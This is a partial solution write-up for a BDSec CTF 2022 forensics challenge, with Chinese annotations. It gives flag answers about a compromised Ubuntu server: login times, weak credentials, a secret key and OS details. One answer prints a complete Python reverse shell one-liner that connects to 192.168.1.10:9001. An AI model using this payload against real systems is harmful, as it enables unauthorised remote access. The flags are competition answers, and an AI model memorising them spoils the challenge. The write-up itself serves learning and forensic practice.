Who was the incharge of the website project? 负责人,这个通过看3个邮件email1,2,3Flag Format : BDSEC{name}
BDSEC{Mark}----Loooong Loooog
50
Can you ananlyze the log file & split out the date time of first successful login?Flag Format : BDSEC{day_month_date_ti:m:e} Example Flag : BDSEC{Sun_May_16_15:38:13}
###nM...log Thu Jul 14 10:16:59 2022 [pid 8631] [ftpadmin] OK LOGIN: Client "::ffff:192.168.1.10"
BDSEC{Thu_Jul_14_10:16:59} 首次登录成功时间,在日志文件里----Administrator
50
What is the admin panel username & password?Flag Format : BDSEC{username_password}
BDSEC{demo_demo}----Shell
50
What reverse shell payload did the attacker used to gain a reverse shell? 提供反向shell用的payloadFlag Format : BDSEC{payload in plain text}
BDSEC{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'} #这个怎么也常觉得不会这么长,还真是这么长----Secret Key
50
What is the secret key? 密钥,这个在数据库表里Flag Format : BDSEC{secretKey}
BDSEC{2jo3t12nv51w1pw4wk1kj58s1jb6w0}----Database Admin
50
What is the database username & password? 数据库用用户密码Flag Format : BDSEC{username_password}
BDSEC{root_root}----HostName
50
What is the hostname of the server? 主机名(把括号去年,空格换下划线)Flag Format : BDSEC{hostname}
BDSEC{Ubuntu}----CodeName
50
What is the codename the server? 在主机信息里的CODENAMEFlag Format : BDSEC{Codname}
BDSEC{xenial}----Server Info
50
What server & version the server is using? (main os)Flag Format : BDSEC{servername_version_something_something}
Example Flag : BDSEC{CentOS_2022.2_LTS_GNU_Linux}主机名(把括号去年,空格换下划线)
BDSEC{Ubuntu_16.04.1_LTS_Xenial_Xerus}----Service Exploit
50
Which service package did the attacker used to gain root access of the server?Flag Format : BDSEC{package_name} 攻击都用root访问的包名
BDSEC{} ?----Exploit Exploit Exploit
50
Which exploit did the attacker used to gain root access of the server?Flag Format : BDSEC{exploit_name}
BDSEC{} ?----Vulnerable Service
50
Which utility is vulnerable to pwnkit? 哪个应用容易受到pwnkit的攻击Flag Format : BDSEC{utility_name}
BDSEC{} ???
----msg.txt
50
What is the content of msg.txt?Flag Format : BDSEC{content_of_the_msg_file}
BDSEC{The_Server_Is_Now_under_My_Control_:D_:D} msg文件是在nc后手工输入的----Attacker
50
What is the attacker name?Flag Format : BDSEC{attacker}
BDSEC{} ?----Server User's
50
How many user's home directory were listed in the server? 数下目录下的用户名Flag Format : BDSEC{0}
BDSEC{8}
[BDSec CTF 2022] 部分WP相关推荐
- Newstar Ctf 2022| week2 wp
Newstar Ctf 2022| week2 wp Newstar Ctf 2022第二周题目的wp. 文章目录 Newstar Ctf 2022| week2 wp Crypto unusual_ ...
- [Jule CTF 2022] 部分WP
这个比赛参加的人极少,比赛有一星期那么长,快结束的时候来了个大牛,一下上到12000+,我这6K只能排到第二了.不过题还是挺不错的.只是入口不是人链接,得自己输才能进,可能很多人因为这个没参加. Cr ...
- Real World CTF 2022(体验赛)部分WP
文章目录 Real World CTF 2022(体验赛) Digital Souvenir log4flag Be-a-Database-Hacker the Secrets of Memory b ...
- 赛宁网安-r3kapig联合战队冲击DEF CON CTF 2022总决赛
1993年,DEF CON黑客大会正式创办,第一届DEF CON CTF则始于1996年,是全球同类赛事中最具影响力的赛事之一,在圈内有着"黑客世界杯"的美誉. DEF CON C ...
- TAMU ctf pwn部分wp+赛后
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga...... Tr*vial 大水题,栈溢出,ret2text exp from pwn import *context(arc ...
- 2022年暑期CTF刷题WP(停止更新)
目录 攻防世界 MISC simple_transfer Reverse simple-unpack logmein getit Bugku MISC 社工-进阶收集 这篇博客用来记录我(一个菜鸡)2 ...
- [CTF]2022美团CTF WEB WP
最终排名 easypickle 源码 import base64 import pickle from flask import Flask, session import os import ran ...
- [GDG CTF 2022] 几个小题,等WP
pwn-counter 作出来的基本都是入门题,这题给了源码,有3个功能1是counter++,2是counter--,但到1就不再减,3是给flag但要求counter==0.由于counter是字 ...
- [SECCON CTF 2022] 只两个小题pwn_koncha,rev_babycmp,crypto_pqpq
从一开始入门CTF,SECCON的名字就如雷贯耳,如今参加了又很失望,距离参加这种比赛还是太远了.只是作了两个100人以上作出来的小题. pwn koncha int __cdecl main(int ...
最新文章
- MyEclipse快捷键
- 高效“炼丹”必备技能:一文实现深度学习数学原理入门,还有吴恩达老师亲授课程...
- 算法笔记-递归算法、递归排序、递归的时间复杂度、master公式(也叫主方法)
- vbs 服务器获取输入信息,取得服务器上用户组列表脚本之VBS版
- 拿下丰厚的年终奖,却未能拯救总薪酬,2021 年度 IT 薪酬调查报告出炉!
- HighLight selected features
- mysql的存储引擎种类,mysql 存储引擎,基本数据类型
- Linus Torvalds: 成功的项目源于99%的汗水与1%的创新
- 2015-2016 ACM-ICPC Northeastern European Regional Contest (NEERC 15)
- VTK:可视化之OrientedGlyphs
- javascript中定义事件的三种方式
- 汇编语言-013(DAS 、DAA与DAS、QWORD类型用SBB借位减法、编写指令将AX符号扩展到EAX,不能使用CWD、用SHR和条件判断指令将AL循环右移一位、SHLD、压缩十进制转换)
- 根据wsdl文件生成WebService客户端代码
- 【CSP201312-2】ISBN号码,字符串,简单模拟
- 杨辉三角形(简明易懂)
- Win7+Ubuntu双系统时间不一致
- SpringMVC学习(七)使用JSON传递数据、jackson和fastjson的使用、处理JSON传输的乱码问题
- fcm基本原理_FCM聚类算法介绍
- VTK系列57_VTK对几何体网格细化(多分辨率处理)
- 微分中的dx和delta x